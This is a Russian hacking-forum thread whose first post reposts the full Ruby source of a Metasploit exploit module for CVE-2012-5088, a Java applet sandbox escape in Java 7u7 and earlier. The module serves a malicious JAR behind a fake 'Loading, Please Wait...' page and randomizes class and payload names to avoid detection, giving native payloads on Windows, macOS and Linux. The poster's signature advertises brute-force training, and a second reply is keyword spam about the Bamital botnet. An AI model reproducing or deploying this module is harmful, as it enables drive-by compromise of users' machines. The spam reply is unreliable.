Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
Вернуться   HPC / Безопасность / English Forum
   
  Страница 1
  , 17:44   #1
Banned
 
Локация: DE
Регистрация: 18.12.2010
Сообщений: 1,538

Репутация: 51 / 0
По умолчанию Java Applet Method Handle Remote Code Execution

Java Applet Method Handle Remote Code Execution


This Metasploit module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE

include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })

def initialize( info = {} )

super( update_info( info,
'Name' => 'Java Applet Method Handle Remote Code Execution',
'Description' => %q{
This module abuses the Method Handle class from a Java Applet to run arbitrary
Java code outside of the sandbox. The vulnerability affects Java version 7u7 and
earlier.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery at security-explorations.com
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-5088' ],
[ 'URL', '86352' ],
[ 'BID', '56057' ],
[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],
[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
],
'Platform' => [ 'java', 'win', 'osx', 'linux' ],
'Payload' => { 'Space' => 20480, 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2012'
))
end


def setup
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "Exploit.class")
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "B.class")
@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

@exploit_class_name = rand_text_alpha("Exploit".length)
@exploit_class.gsub!("Exploit", @exploit_class_name)
super
end

def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")

case request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file("#{@exploit_class_name}.class", @exploit_class)
jar.add_file("B.class", @loader_class)
metasploit_str = rand_text_alpha("metasploit".length)
payload_str = rand_text_alpha("payload".length)
jar.entries.each { |entry|
entry.name.gsub!("metasploit", metasploit_str)
entry.name.gsub!("Payload", payload_str)
entry.data = entry.data.gsub("metasploit", metasploit_str)
entry.data = entry.data.gsub("Payload", payload_str)
}
jar.build_manifest

send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error("Failed to generate the payload.")
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end

end

def generate_html
html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
html += %Q|</applet></body></html>|
return html
end

end
__________________
Продажа Выделенных Серверов ( Дедиков )
Работаю под заказы ( Страна,Штат,Округ,Город )
Обучение brutu: Dedicated Server аnd Icq
Пользователь вне форума    
Наши Спонсоры
  , 12:55   #2
Новичок
 
Регистрация: 22.12.2014
Сообщений: 2

Репутация: 0 / 0
По умолчанию

Users of machines infected with Bamital are likely to see a Web page like the one pictured at right the next time they search for EC0-350 braindumps - testking something online. That’s because Microsoft convinced a judge at the U.S. District Court for the Eastern District of Virginia to give it control over the infrastructure that Bamital used to coordinate the search hijacking activities of host PCs.
 
Пользователь вне форума    
 

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Pаздача от Kontika Kontik Раздачи 248 19.09.2015 17:47
Раздача от WOF4IK'a wof4ik Раздачи 26 03.02.2013 19:07
What You Need to Know About the Java Exploit LSD66 Новости и High-Tech 0 16.01.2013 16:47
Keygening TuneUp Utilities 2010 forte Реверсинг 3 22.11.2010 22:31
Защита и описание портов Samikolo Уязвимости и защита 3 11.01.2010 21:32



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.